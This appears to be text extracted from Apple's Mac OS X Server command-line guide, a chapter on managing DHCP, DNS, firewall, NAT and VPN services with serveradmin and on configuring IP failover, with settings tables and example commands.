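$ echo 'web:Sites:_array_id:_ipaddr\:_port__servername:ServerName = _servername' | sed -e 's#_ipaddr#10.0.0.2#g' -e 's#_port#80#g' -e 's#_servername#corpsite#g'
web:Sites:_array_id:10.0.0.2\:80_corpsite:ServerName = corpsite

Every line of addsite.in is transformed the same way, so the site the script creates is keyed by the combination of address, port, and server name you supply.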
LL2354.book Page 128 Monday, October 20, 2003 9:47 AM 13 129 13 Working With Network Services Commands you can use to manage DHCP, DNS, Firewall, NAT, and VPN service in Mac OS X Server. DHCP Service Starting and Stopping DHCP Service To start DHCP service: $ sudo serveradmin start dhcp To stop DHCP service: $ sudo serveradmin stop dhcp Checking the Status of DHCP Service To see summary status of DHCP service: $ sudo serveradmin status dhcp To see detailed status of DHCP service: $ sudo serveradmin fullstatus dhcp Viewing DHCP Service Settings To list DHCP service configuration settings: $ sudo serveradmin settings dhcp To list a particular setting: $ sudo serveradmin settings dhcp:setting To list a group of settings: You can list a group of settings that have part of their names in common by typing only as much of the name as you want, stopping at a colon (:), and typing an asterisk (*) as a wildcard for the remaining parts of the name. For example, $ sudo serveradmin settings dhcp:subnets:* LL2354.book Page 129 Monday, October 20, 2003 9:47 AM 130 Chapter 13 Working With Network Services Changing DHCP Service Settings To change a setting: $ sudo serveradmin settings dhcp:setting = value To change several settings: $ sudo serveradmin settings dhcp:setting = value dhcp:setting = value dhcp:setting = value [...] Control-D DHCP Service Settings Use the following parameters with the serveradmin command to change settings for the dhcp service. Parameter Description setting A DHCP service setting. To see a list of available settings, type $ sudo serveradmin settings dhcp or see “DHCP Service Settings” on this page and “DHCP Subnet Settings Array” on page 131. value An appropriate value for the setting. Parameter (dhcp:) Description logging_level "LOW"|"MEDIUM"|"HIGH" Default = "MEDIUM" Corresponds to the Log Detail Level pop-up menu in the Logging pane of DHCP service settings in the Server Admin GUI application. subnet_status Default = 0 subnet_defaults:logVerbosity "LOW"|"MEDIUM"|"HIGH" Default = "MEDIUM" subnet_defaults:logVerbosityList: _array_index:n Available values for the logVerbosity setting. Default = "LOW," "MEDIUM," and "HIGH" subnet_defaults:WINS_node_type Default = "NOT_SET" subnet_defaults:routers Default = empty_dictionary subnet_defaults:selected_port_key Default = en0 subnet_defaults:selected_port_key _list:_array_index:n An array of available ports. subnet_defaults:dhcp_domain_name Default = The last portion of the server’s host name, for example, company.com. LL2354.book Page 130 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 131 DHCP Subnet Settings Array An array of the settings listed in the following table is included in the DHCP service settings for each subnet you define. You can add a subnet to the DHCP configuration by using serveradmin to add an array of these settings. About Subnet IDs In an actual list of settings, <subnetID> is replaced with a unique ID code for the subnet. The IDs generated by the server are just random numbers. The only requirement for this ID is that it be unique among the subnets defined on the server. subnet_defaults:dhcp_domain_name_ server:_array_index:n Default = The DNS server addresses provided during server setup, as listed in the Network pane of the server’s System Preferences. subnets:_array_id:<subnetID>... An array of settings for a particular subnet. <subnetID> is a unique identifier for each subnet. See “DHCP Subnet Settings Array” on this page. 
Parameter (dhcp:) Description Subnet Parameter subnets:_array_id:<subnetID>: Description descriptive_name A textual description of the subnet. Corresponds to the Subnet Name field in the General pane of the subnet settings in the Server Admin GUI application. dhcp_domain_name The default domain for DNS searches, for example, company.com. Corresponds to the Default Domain field in the DNS pane of the subnet settings in the Server Admin GUI application. dhcp_domain_name_server: _array_index:n The primary WINS server to be used by clients. Corresponds to the Name Servers field in the DNS pane of the subnet settings in the Server Admin GUI application. dhcp_enabled Whether DHCP is enabled for this subnet. Corresponds to the Enable checkbox in the list of subnets in the Subnets pane of the DHCP settings in the Server Admin GUI application. dhcp_ldap_url: _array_index:n The URL of the LDAP directory to be used by clients. Corresponds to the Lease URL field in the LDAP pane of the subnet settings in the Server Admin GUI application. dhcp_router The IPv4 address of the subnet’s router. Corresponds to the Router field in the General pane of the subnet settings in the Server Admin GUI application. LL2354.book Page 131 Monday, October 20, 2003 9:47 AM 132 Chapter 13 Working With Network Services lease_time_secs Lease time in seconds. Default = "3600" Corresponds to the Lease Time pop-up menu and field in the General pane of the subnet settings in the Server Admin GUI application. net_address The IPv4 network address for the subnet. net_mask The subnet mask for the subnet. Corresponds to the Subnet Mask field in the General pane of the subnet settings in the Server Admin GUI application. net_range_end The highest available IPv4 address for the subnet. Corresponds to the Ending IP Address field in the General pane of the subnet settings in the Server Admin GUI application. net_range_start The lowest available IPv4 address for the subnet. Corresponds to the Starting IP Address field in the General pane of the subnet settings in the Server Admin GUI application. selected_port_name The network port for the subnet. Corresponds to the Network Interface pop-up menu in the General pane of the subnet settings in the Server Admin GUI application. WINS_NBDD_server The NetBIOS Datagram Distribution Server IPv4 address. Corresponds to the NBDD Server field in the WINS pane of the subnet settings in the Server Admin GUI application. WINS_node_type The WINS node type. Can be set to: "" (not set, default) BROADCAST_B_NODE PEER_P_NODE MIXED_M_NODE HYBRID-H-NODE Corresponds to the NBT Node Type field in the WINS pane of the subnet settings in the Server Admin GUI application. WINS_primary_server The primary WINS server to be used by clients. Corresponds to the WINS/NBNS Primary Server field in the WINS pane of the subnet settings in the Server Admin GUI application. Subnet Parameter subnets:_array_id:<subnetID>: Description LL2354.book Page 132 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 133 Adding a DHCP Subnet You may already have a subnet for each port you enabled when you installed and set up the server. You can use the serveradmin settings command to check for subnets that the server set up for you; see “Viewing DHCP Service Settings” on page 129. You can use the serveradmin settings command to add other subnets to your DHCP configuration. Note: Be sure to include the special first setting (ending with = create). 
This is how you tell serveradmin to create the necessary settings array with the specified subnet ID. To add a subnet: $ sudo serveradmin settings dhcp:subnets:_array_id:subnetID = create dhcp:subnets:_array_id:subnetID:WINS_NBDD_server = nbdd-server dhcp:subnets:_array_id:subnetID:WINS_node_type = node-type dhcp:subnets:_array_id:subnetID:net_range_start = start-address dhcp:subnets:_array_id:subnetID:WINS_scope_id = scope-ID dhcp:subnets:_array_id:subnetID:dhcp_router = router dhcp:subnets:_array_id:subnetID:net_address = net-address dhcp:subnets:_array_id:subnetID:net_range_end = end-address dhcp:subnets:_array_id:subnetID:lease_time_secs = lease-time dhcp:subnets:_array_id:subnetID:dhcp_ldap_url:_array_index:0 = ldap-server dhcp:subnets:_array_id:subnetID:WINS_secondary_server = wins-server-2 dhcp:subnets:_array_id:subnetID:descriptive_name = description dhcp:subnets:_array_id:subnetID:WINS_primary_server = wins-server-1 dhcp:subnets:_array_id:subnetID:dhcp_domain_name = domain dhcp:subnets:_array_id:subnetID:dhcp_enabled = (yes|no) dhcp:subnets:_array_id:subnetID:dhcp_domain_name_server:_array_index:0 = dns-server-1 dhcp:subnets:_array_id:subnetID:dhcp_domain_name_server:_array_index:1 = dns-server-2 dhcp:subnets:_array_id:subnetID:net_mask = mask dhcp:subnets:_array_id:subnetID:selected_port_name = port Control-D WINS_scope_id A domain name such as apple.com. Default = "" Corresponds to the NetBIOS Scope ID field in the WINS pane of the subnet settings in the Server Admin GUI application. WINS_secondary_server The secondary WINS server to be used by clients. Corresponds to the WINS/NBNS Secondary Server field in the WINS pane of the subnet settings in the Server Admin GUI application. Subnet Parameter subnets:_array_id:<subnetID>: Description LL2354.book Page 133 Monday, October 20, 2003 9:47 AM 134 Chapter 13 Working With Network Services List of DHCP serveradmin Commands You can use the following command with the serveradmin application to manage DHCP service. Viewing the DHCP Service Log You can use tail or any other file listing tool to view the contents of the DHCP service log. To view the latest entries in a log: $ tail log-file You can use the serveradmin getLogPaths command to see where the current DHCP log is located. To display the log path: $ sudo serveradmin command dhcp:command = getLogPaths Output dhcp:systemLog = <system-log> Parameter Description subnetID A unique number that identifies the subnet. Can be any number not already assigned to another subnet defined on the server. Can include embedded hyphens (-). dns-server-n To specify additional DNS servers, add additional dhcp_name_server settings, incrementing _array_index:n for each additional value. Other parameters The standard subnet settings described under “DHCP Subnet Settings Array” on page 131. Command (dhcp:command=) Description getLogPaths Determine the location of the DHCP service logs. Value Description <system-log> The location of the DNS service log. 
Default = /var/logs/system.log LL2354.book Page 134 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 135 DNS Service Starting and Stopping the DNS Service To start DNS service: $ sudo serveradmin start dns To stop DNS service: $ sudo serveradmin stop dns Checking the Status of DNS Service To see summary status of DNS service: $ sudo serveradmin status dns To see detailed status of DNS service: $ sudo serveradmin fullstatus dns Viewing DNS Service Settings To list DNS service configuration settings: $ sudo serveradmin settings dns To list a particular setting: $ sudo serveradmin settings dns:setting To list a group of settings: Type only as much of the name as you want, stopping at a colon (:), then type an asterisk (*) as a wildcard for the remaining parts of the name. For example, $ sudo serveradmin settings dns:zone:_array_id:localhost:* Changing DNS Service Settings You can use serveradmin to modify your server’s DNS configuration. However, you’ll probably find it more straightforward to work directly with DNS and BIND using the standard tools and techniques described in the many books on the subject. (See, for example, “DNS and BIND” by Paul Albitz and Cricket Liu.) DNS Service Settings To list the settings, see “Viewing DNS Service Settings” on this page. List of DNS serveradmin Commands Viewing the DNS Service Log You can use tail or any other file listing tool to view the contents of the DNS service log. Command (dns:command=) Description getLogPaths Find the location of the DNS service log. See “Viewing the DNS Service Log” on this page. getStatistics Retrieve DNS service statistics. See “Listing DNS Service Statistics” on page 136. LL2354.book Page 135 Monday, October 20, 2003 9:47 AM 136 Chapter 13 Working With Network Services To view the latest entries in a log: $ tail log-file You can use the serveradmin getLogPaths command to see where the current DNS log is located. The default is /Library/Logs/named.log. To display the log path: $ sudo serveradmin command dns:command = getLogPaths Listing DNS Service Statistics You can use the serveradmin getStatistics command to display a summary of current DNS service workload. 
To list statistics: $ sudo serveradmin command dns:command = getStatistics Sample Output dns:queriesArray:_array_index:0:name = "NS_QUERIES" dns:queriesArray:_array_index:0:value = -1 dns:queriesArray:_array_index:1:name = "A_QUERIES" dns:queriesArray:_array_index:1:value = -1 dns:queriesArray:_array_index:2:name = "CNAME_QUERIES" dns:queriesArray:_array_index:2:value = -1 dns:queriesArray:_array_index:3:name = "PTR_QUERIES" dns:queriesArray:_array_index:3:value = -1 dns:queriesArray:_array_index:4:name = "MX_QUERIES" dns:queriesArray:_array_index:4:value = -1 dns:queriesArray:_array_index:5:name = "SOA_QUERIES" dns:queriesArray:_array_index:5:value = -1 dns:queriesArray:_array_index:6:name = "TXT_QUERIES" dns:queriesArray:_array_index:6:value = -1 dns:nxdomain = 0 dns:nxrrset = 0 dns:reloadedTime = "" dns:success = 0 dns:failure = 0 dns:recursion = 0 dns:startedTime = "2003-09-10 11:24:03 -0700" dns:referral = 0 Firewall Service Starting and Stopping Firewall Service To start Firewall service: $ sudo serveradmin start ipfilter To stop Firewall service: $ sudo serveradmin stop ipfilter LL2354.book Page 136 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 137 Checking the Status of Firewall Service To see summary status of Firewall service: $ sudo serveradmin status ipfilter To see detailed status of Firewall service, including rules: $ sudo serveradmin fullstatus ipfilter Viewing Firewall Service Settings To list Firewall service configuration settings: $ sudo serveradmin settings ipfilter To list a particular setting: $ sudo serveradmin settings ipfilter:setting To list a group of settings: Type only as much of the name as you want, stopping at a colon (:), then type an asterisk (*) as a wildcard for the remaining parts of the name. For example, $ sudo serveradmin settings ipfilter:ipAddressGroups:* Changing Firewall Service Settings To change a setting: $ sudo serveradmin settings ipfilter:setting = value To change several settings: $ sudo serveradmin settings ipfilter:setting = value ipfilter:setting = value ipfilter:setting = value [...] Control-D Firewall Service Settings Use the following parameters with the serveradmin command to change settings for the IPFilter service. Parameter Description setting A IPFilter service setting. See “Firewall Service Settings” on this page. value An appropriate value for the setting. Parameter (ipfilter:) Description ipAddressGroupsWithRules: _array_id:<group>... An array of settings describing the services allowed for specific IP address groups. See “IPFilter Groups With Rules Array” on page 138. rules:_array_id:<rule>:... Arrays of rule settings, one array per defined rule. See “IPFilter Rules Array” on page 141. LL2354.book Page 137 Monday, October 20, 2003 9:47 AM 138 Chapter 13 Working With Network Services IPFilter Groups With Rules Array An array of the following settings is included in the IPFilter settings for each defined IP address group. These arrays aren’t part of a standard ipfw configuration, but are created by the Server Admin GUI application to implement the IP Address groups on the General pane of the Firewall service settings. In an actual list of settings, <group> is replaced with an IP address group. Defining Firewall Rules You can use serveradmin to set up firewall rules for your server. However, a simpler method is to add your rules to a configuration file used by the service. 
By modifying the file, you’ll be able to define your rules using standard rule syntax instead of creating a specialized array to store the rule’s components. Adding Rules by Modifying ipfw.conf The file in which you can define your rules is /etc/ipfilter/ipfw.conf. The Firewall service reads this file, but doesn’t modify it. Its contents are annotated and include commented-out rules you can use as models. Its default contents are listed below. For more information, read the ipfw man page. logAllDenied Specifies whether to log all denials. Default = no ipAddressGroups:_array_id: n:address The address of a defined IP address group, the first element of an array that defines an IP address group. ipAddressGroups:_array_id: n:name The name of a defined IP address group, the second element of an array that defines an IP address group. logAllAllowed Whether to log access allowed by rules. Default = no Parameter (ipfilter:) Description Parameter (ipfilter:) Description ipAddressGroupsWithRules: _array_id:<group>:rules An array of rules for the group. ipAddressGroupsWithRules: _array_id:<group>:addresses The group’s address. ipAddressGroupsWithRules: _array_id:<group>:name The group’s name. ipAddressGroupsWithRules: _array_id:<group>:readOnly Whether the group is set for read-only. LL2354.book Page 138 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 139 The unmodified ipfw.conf file: # ipfw.conf.default - Installed by Apple, never modified by Server Admin app # # ipfw.conf - The servermgrd process (the back end of Server Admin app) # creates this from ipfw.conf.default if it's absent, but does not modify # it. # # Administrators can place custom ipfw rules in ipfw.conf. # # Whenever a change is made to the ipfw rules by the Server Admin # application and saved: # 1. All ipfw rules are flushed # 2. The rules defined by the Server Admin app (stored as plists) # are exported to /etc/ipfilter/ipfw.conf.apple and loaded into the # firewall via ipfw. # 3. The rules in /etc/ipfilter/ipfw.conf are loaded into the firewall # via ipfw. # Note that the rules loaded into the firewall are not applied unless the # firewall is enabled. # # The rules resulting from the Server Admin app's IPFirewall and NAT panels # are numbered: # 10 - from the NAT Service - this is the NAT divert rule, present only # when he NAT service is started via the Server Admin app. # 1000 - from the "Advanced" panel - the modifiable rules, ordered by # their relative position in the drag-sortable rule list # 12300 - from the "General" panel - "allow"" rules that punch specific # holes in the firewall for specific services # 63200 - from the "Advanced" panel - the non-modifiable rules at the # bottom of the panel's rule list # # Refer to the man page for ipfw(8) for more information. # # The following default rules are already added by default: # #add 01000 allow all from any to any via lo0 #add 01010 deny all from any to 127.0.0.0/8 #add 01020 deny ip from 224.0.0.0/4 to any in #add 01030 deny tcp from any to 224.0.0.0/4 in #add 12300 ("allow" rules from the "General" panel) #... #add 63200 deny icmp from any to any in icmptypes 0 in #add 63300 deny igmp from any to any in #add 65000 deny tcp from any to any in setup For more information, read the ipfw man page. 
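The default file contains only comments and commented-out rules. As a sketch of the kind of custom rule you might append to /etc/ipfilter/ipfw.conf — the rule number, source address, and port here are hypothetical examples, not part of the default file — an entry allowing SSH from a single trusted host could look like this:

add 01100 allow tcp from 10.0.0.5 to any 22 in

Because the Server Admin application reloads ipfw.conf whenever firewall changes are saved but never modifies it, rules added this way persist alongside the rules generated from the application's own panels. See the ipfw man page for the full rule syntax.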
Adding Rules Using serveradmin
If you prefer not to work with the ipfw.conf file, you can use the serveradmin settings command to add firewall rules to your configuration.
Note: Be sure to include the special first setting (ending with = create). This is how you tell serveradmin to create the necessary rule array with the specified rule number.
To add a rule:
$ sudo serveradmin settings ipfilter:rules:_array_id:rule = create
ipfilter:rules:_array_id:rule:source = source
ipfilter:rules:_array_id:rule:protocol = protocol
ipfilter:rules:_array_id:rule:destination = destination
ipfilter:rules:_array_id:rule:action = action
ipfilter:rules:_array_id:rule:enableLocked = (yes|no)
ipfilter:rules:_array_id:rule:enabled = (yes|no)
ipfilter:rules:_array_id:rule:log = (yes|no)
ipfilter:rules:_array_id:rule:readOnly = (yes|no)
ipfilter:rules:_array_id:rule:source-port = port
Control-D

Example:
$ sudo serveradmin settings ipfilter:rules:_array_id:1111 = create
ipfilter:rules:_array_id:1111:source = "10.10.41.60"
ipfilter:rules:_array_id:1111:protocol = "udp"
ipfilter:rules:_array_id:1111:destination = "any via en0"
ipfilter:rules:_array_id:1111:action = "allow"
ipfilter:rules:_array_id:1111:enableLocked = yes
ipfilter:rules:_array_id:1111:enabled = yes
ipfilter:rules:_array_id:1111:log = no
ipfilter:rules:_array_id:1111:readOnly = yes
ipfilter:rules:_array_id:1111:source-port = ""
Control-D

Parameter Description
rule A unique rule number.
Other parameters The standard rule settings described under "IPFilter Rules Array" on page 141.

IPFilter Rules Array
An array of the following settings is included in the IPFilter settings for each defined firewall rule. In an actual list of settings, <rule> is replaced with a rule number. You can add a rule by using serveradmin to create such an array in the firewall settings (see "Adding Rules Using serveradmin" on page 140).

Parameter (ipfilter:) Description
rules:_array_id:<rule>:source The source of traffic governed by the rule.
rules:_array_id:<rule>:protocol The protocol for traffic governed by the rule.
rules:_array_id:<rule>:destination The destination of traffic governed by the rule.
rules:_array_id:<rule>:action The action to be taken.
rules:_array_id:<rule>:enabled Whether the rule is enabled.
rules:_array_id:<rule>:log Whether activation of the rule is logged.
rules:_array_id:<rule>:readOnly Whether read-only is set.
rules:_array_id:<rule>:source-port The source port of traffic governed by the rule.

Firewall serveradmin Commands
You can use the following commands with the serveradmin application to manage Firewall (ipfilter) service.

Command (ipfilter:command=) Description
getLogPaths Find the current location of the log used by the service. Default = /var/log/system.log
getStandardServices Retrieve a list of the standard services as they appear on the General pane of the Firewall service settings in the Server Admin GUI application.
writeSettings Equivalent to the standard serveradmin settings command, but also returns a setting indicating whether the service needs to be restarted. See "Determining Whether a Service Needs to be Restarted" on page 19.
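Each of these commands is issued with the same serveradmin command syntax used for the other services in this guide. For example, to list the standard services:

$ sudo serveradmin command ipfilter:command = getStandardServices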
LL2354.book Page 141 Monday, October 20, 2003 9:47 AM 142 Chapter 13 Working With Network Services Viewing Firewall Service Log You can use tail or any other file listing tool to view the contents of the ipfilter service log. To view the latest entries in the log: $ tail log-file You can use the serveradmin getLogPaths command to see where the current ipfilter service log is located. To display the log path: $ sudo serveradmin command ipfilter:command = getLogPaths Output ipfilter:systemLog = <system-log> Using Firewall Service to Simulate Network Activity You can use the Firewall service in Mac OS X service in conjunction with Dummynet, a general-purpose network load simulator. For more information on Dummynet, visit ai3.asti.dost.gov.ph/sat/dummynet.html or use Google or Sherlock to search the web. NAT Service Starting and Stopping NAT Service To start NAT service: $ sudo serveradmin start nat To stop NAT service: $ sudo serveradmin stop nat Checking the Status of NAT Service To see summary status of NAT service: $ sudo serveradmin status nat To see detailed status of NAT service: $ sudo serveradmin fullstatus nat Viewing NAT Service Settings To list NAT service configuration settings: $ sudo serveradmin settings nat To list a particular setting: $ sudo serveradmin settings nat:setting Value Description <system-log> The location of the ipfilter service log. Default = /var/log/system.log LL2354.book Page 142 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 143 Changing NAT Service Settings To change a setting: $ sudo serveradmin settings nat:setting = value To change several settings: $ sudo serveradmin settings nat:setting = value nat:setting = value nat:setting = value [...] Control-D NAT Service Settings Use the following parameters with the serveradmin command to change settings for NAT service. Parameter Description setting A NAT service setting. To see a list of available settings, type $ sudo serveradmin settings nat or see “NAT Service Settings” on this page. value An appropriate value for the setting. Parameter (nat:) Description deny_incoming yes|no Default = no. log_denied yes|no Default = no. clamp_mss yes|no Default = yes reverse yes|no Default = no log yes|no Default = yes proxy_only yes|no Default = no dynamic yes|no Default = yes use_sockets yes|no Default = yes interface The network port. Default = "en0" LL2354.book Page 143 Monday, October 20, 2003 9:47 AM 144 Chapter 13 Working With Network Services NAT serveradmin Commands You can use the following commands with the serveradmin application to manage NAT service. Viewing the NAT Service Log You can use tail or any other file listing tool to view the contents of the NAT service log. To view the latest entries in the log: $ tail log-file You can use the serveradmin getLogPaths command to see where the current NAT service log is located. To display the log path: $ sudo serveradmin command nat:command = getLogPaths Output nat:natLog = <nat-log> unregistered_only yes|no Default = no same_ports yes|no Default = yes Parameter (nat:) Description Command (nat:command=) Description getLogPaths Find the current location of the log used by the NAT service. See “Viewing the NAT Service Log” on this page. updateNATRuleInIpfw Update the firewall rules defined in the ipfilter service to reflect changes in the NAT settings. writeSettings Equivalent to the standard serveradmin settings command, but also returns a setting indicating whether the service needs to be restarted. 
See “Determining Whether a Service Needs to be Restarted” on page 19. Value Description <nat-log> The location of the NAT service log. Default = /var/log/alias.log LL2354.book Page 144 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 145 VPN Service Starting and Stopping VPN Service To start VPN service: $ sudo serveradmin start vpn To stop VPN service: $ sudo serveradmin stop vpn Checking the Status of VPN Service To see summary status of VPN service: $ sudo serveradmin status vpn To see detailed status of VPN service: $ sudo serveradmin fullstatus vpn Viewing VPN Service Settings To list VPN service configuration settings: $ sudo serveradmin settings vpn To list a particular setting: $ sudo serveradmin settings vpn:setting Changing VPN Service Settings To change a setting: $ sudo serveradmin settings vpn:setting = value To change several settings: $ sudo serveradmin settings vpn:setting = value vpn:setting = value vpn:setting = value [...] Control-D Parameter Description setting A VPN service setting. To see a list of available settings, type $ sudo serveradmin settings vpn or see “List of VPN Service Settings” on page 146. value An appropriate value for the setting. LL2354.book Page 145 Monday, October 20, 2003 9:47 AM 146 Chapter 13 Working With Network Services List of VPN Service Settings Use the following parameters with the serveradmin command to change settings for VPN service. Parameter (vpn:Servers:) Description com.<name>.ppp.l2tp: Server:VerboseLogging Default = 1 com.<name>.ppp.l2tp: Server:MaximumSessions Default = 128 com.<name>.ppp.l2tp: Server:LogFile Default = "/var/log/ppp/vpnd.log" com.<name>.ppp.l2tp: L2TP:IPSecSharedSecretEncryption Default = "Key" com.<name>.ppp.l2tp: L2TP:IPSecSharedSecretValue Default = "" com.<name>.ppp.l2tp: L2TP:IPSecSharedSecret Default = "" com.<name>.ppp.l2tp: L2TP:Transport Default = "IPSec" com.<name>.ppp.l2tp: enabled Default = no com.<name>.ppp.l2tp: IPv4:DestAddressRanges Default = _empty_array com.<name>.ppp.l2tp: IPv4:OfferedRouteMasks Default = _empty_array com.<name>.ppp.l2tp: IPv4:OfferedRouteAddresses Default = _empty_array com.<name>.ppp.l2tp: IPv4:OfferedRouteTypes Default = _empty_array com.<name>.ppp.l2tp: IPv4:ConfigMethod Default = "Manual" com.<name>.ppp.l2tp: DNS:OfferedSearchDomains Default = _empty_array com.<name>.ppp.l2tp: DNS:OfferedServerAddresses Default = _empty_array com.<name>.ppp.l2tp: DSACL:Group Default = "" com.<name>.ppp.l2tp: Interface:SubType Default = "L2TP" com.<name>.ppp.l2tp: Interface:Type Default = "PPP" com.<name>.ppp.l2tp: PPP:LCPEchoFailure Default = 5 LL2354.book Page 146 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 147 com.<name>.ppp.l2tp: PPP:DSACLEnabled Default = no com.<name>.ppp.l2tp: PPP:VerboseLogging Default = 1 com.<name>.ppp.l2tp: PPP:AuthenticatorPlugins: _array_index:n Default = "DSAuth" com.<name>.ppp.l2tp: PPP:LCPEchoInterval Default = 60 com.<name>.ppp.l2tp: PPP:LCPEchoEnabled Default = 1 com.<name>.ppp.l2tp: PPP:IPCPCompressionVJ Default = 0 com.<name>.ppp.l2tp: PPP:AuthenticatorProtocol: _array_index:n Default = "MSCHAP2" com.<name>.ppp.l2tp: PPP:LogFile Default = "/var/log/ppp/vpnd.log" com.<name>.ppp.pptp: Server:VerboseLogging Default = 1 com.<name>.ppp.pptp: Server:MaximumSessions Default = 128 com.<name>.ppp.pptp: Server:LogFile Default = "/var/log/ppp/vpnd.log" com.<name>.ppp.pptp: enabled Default = no com.<name>.ppp.pptp: IPv4:DestAddressRanges Default = _empty_array com.<name>.ppp.pptp: IPv4:OfferedRouteMasks Default 
= _empty_array com.<name>.ppp.pptp: IPv4:OfferedRouteAddresses Default = _empty_array com.<name>.ppp.pptp: IPv4:OfferedRouteTypes Default = _empty_array com.<name>.ppp.pptp: IPv4:ConfigMethod Default = "Manual" com.<name>.ppp.pptp: DNS:OfferedSearchDomains Default = _empty_array com.<name>.ppp.pptp: DNS:OfferedServerAddresses Default = _empty_array com.<name>.ppp.pptp: DSACL:Group Default = "" Parameter (vpn:Servers:) Description LL2354.book Page 147 Monday, October 20, 2003 9:47 AM 148 Chapter 13 Working With Network Services com.<name>.ppp.pptp: Interface:SubType Default = "PPTP" com.<name>.ppp.pptp: Interface:Type Default = "PPP" com.<name>.ppp.pptp: PPP:CCPProtocols:_array_index:n Default = "MPPE" com.<name>.ppp.pptp: PPP:LCPEchoFailure Default = 5 com.<name>.ppp.pptp: PPP:MPPEKeySize128 Default = 1 com.<name>.ppp.pptp: PPP:DSACLEnabled Default = no com.<name>.ppp.pptp: PPP:VerboseLogging Default = 1 com.<name>.ppp.pptp: PPP:AuthenticatorPlugins: _array_index:n Default = "DSAuth" com.<name>.ppp.pptp: PPP:MPPEKeySize40 Default = 0 com.<name>.ppp.pptp: PPP:LCPEchoInterval Default = 60 com.<name>.ppp.pptp: PPP:LCPEchoEnabled Default = 1 com.<name>.ppp.pptp: PPP:CCPEnabled Default = 1 com.<name>.ppp.pptp: PPP:IPCPCompressionVJ Default = 0 com.<name>.ppp.pptp: PPP:AuthenticatorProtocol: _array_index:n Default = "MSCHAP2" com.<name>.ppp.pptp: PPP:LogFile Default = "/var/log/ppp/vpnd.log" Parameter (vpn:Servers:) Description LL2354.book Page 148 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 149 List of VPN serveradmin Commands You can use the following commands with the serveradmin application to manage VPN service. Viewing the VPN Service Log You can use tail or any other file listing tool to view the contents of the VPN service log. To view the latest entries in the log: $ tail log-file You can use the serveradmin getLogPaths command to see where the current VPN service log is located. To display the log path: $ sudo serveradmin command vpn:command = getLogPaths Output vpn:vpnLog = <vpn-log> Command (vpn:command=) Description getLogPaths Find the current location of the VPN service log. See “Viewing the VPN Service Log” on this page. writeSettings Equivalent to the standard serveradmin settings command, but also returns a setting indicating whether the service needs to be restarted. See “Determining Whether a Service Needs to be Restarted” on page 19. Value Description <vpn-log> The location of the VPN service log. Default = /var/log/vpnd.log LL2354.book Page 149 Monday, October 20, 2003 9:47 AM 150 Chapter 13 Working With Network Services IP Failover IP failover allows a secondary server to acquire the IP address of a primary server if the primary server ceases to function. Once the primary server returns to normal operation, the secondary server relinquishes the IP address. This allows your website to remain available on the network even if the primary server is temporarily offline. Note: IP failover only allows a secondary server to acquire a primary server’s IP address. You need additional software tools such as rsync to provide capabilities such as mirroring the primary server’s data on the secondary server. See the rsync man pages for more information. Requirements IP failover isn’t a complete solution; it is one tool you can use to increase your server’s availability to your clients. To use IP failover, you will need to set up the following hardware and software. 
Hardware IP failover requires the following hardware setup: • Primary server • Secondary server • Public network (servers must be on same subnet) • Private network between the servers (additional network interface card) Note: Because IP failover uses broadcast messages, both servers must have IP addresses on the same subnet of the public network. In addition, both servers must have IP addresses on the same subnet of the private network. Software IP failover requires the following software setup: • Unique IP addresses for each network interface (public and private) • Software to mirror primary server data to secondary server • Scripts to control failover behavior on secondary server (optional) Failover Operation When IP failover is active, the primary server periodically broadcasts a brief message confirming normal operation on both the public and private networks. This message is monitored by the secondary server. • If the broadcast is interrupted on both public and private networks, the secondary server initiates the failover process. • If status messages are interrupted on only one network, the secondary server sends email notification of a network anomaly, but doesn’t acquire the primary server’s IP address. Email notification is sent when the secondary server detects a failover condition, a network anomaly, and when the IP address is relinquished back to the primary server. LL2354.book Page 150 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 151 Enabling IP Failover You enable IP failover by adding command lines to the file /etc/hostconfig on the primary and the secondary server. Be sure to enter these lines exactly as shown with regard to spaces and punctuation marks. To enable IP failover: 1 At the primary server, add the following line to /etc/hostconfig: FAILOVER_BCAST_IPS="10.0.0.255 100.0.255.255" Substitute the broadcast addresses used on your server for the public and private networks. This tells the server to send broadcast messages over relevant network interfaces that the server at those IP addresses is functioning. 2 Restart the primary server so that your changes can take effect. 3 Disconnect the primary server from both the public and private networks. 4 At the secondary server, add the following lines to /etc/hostconfig: FAILOVER_PEER_IP="10.0.0.1" FAILOVER_PEER_IP_PAIRS="en0:100.0.0.10" FAILOVER_EMAIL_RECIPIENT="admin@example.com" In the first line substitute the IP address of the primary server on the private network. In the second line enter the local network interface that should adopt the primary server’s public IP address, a colon, then the primary server’s public IP address. (Optional) In the third line, enter the email address for notification messages regarding the primary server status. If this line is omitted, email notifications are sent to the root account on the local machine. 5 Restart the secondary server so your changes can take effect and allow the secondary server to acquire the primary’s public IP address. Important: Before you enable IP Failover, verify on both servers that the port used for the public network is at the top of the Network Port Configurations list in the Network pane of System Preferences. Also verify that the port used for the private network contains no DNS configuration information. 6 Reconnect the primary server to the private network, wait fifteen seconds, then reconnect the primary server to the public network. 7 Verify that the secondary server relinquishes the primary server’s public IP address. 
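One informal way to check steps 5 and 7 — a sketch that assumes the example values used above (public IP address 100.0.0.10 acquired on interface en0) — is to inspect the secondary server's interface configuration from the command line:

$ ifconfig en0 | grep 100.0.0.10

While the primary server is offline, this should print an inet line containing the acquired address; after the primary returns to service and the address is relinquished, it should print nothing.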
